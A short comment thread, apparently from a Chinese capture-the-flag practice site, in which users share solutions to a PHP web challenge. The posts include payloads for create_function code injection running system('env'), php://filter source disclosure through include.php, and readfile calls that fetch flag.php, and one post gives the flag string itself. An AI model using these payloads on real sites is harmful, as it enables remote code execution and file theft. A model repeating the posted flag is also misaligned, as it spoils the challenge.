coolsword2023 @ 2024-01-07 23:22:30 👍0
createfun.php?func=create_function&&arg=){}system("env");//
xiaoxiao972521 @ 2024-05-07 23:22:30 👍0
这个角度清奇哎,我是createfun.php?func=readfile&arg=flag.php
zhaiye @ 2023-12-07 23:22:30 👍0
nuaactf{php_IS_thE_best_language}
justsosoloveyou @ 2023-11-07 23:22:30 👍0
html注释,cookie,/include.php?file=php://filter/read=convert.base64-encode/resource=createfun, /createfun.php?func=highlight_file&arg=flag.php
hopeinhand @ 2023-09-07 23:22:30 👍4
注释有一个include.php,访问发现有文件包含,调出源码后提示createfun.php,发现可以执行自定义函数,show_source flag.php
createfun.php?func=readfile&arg=flag.php,php查看文件的函数都可以试试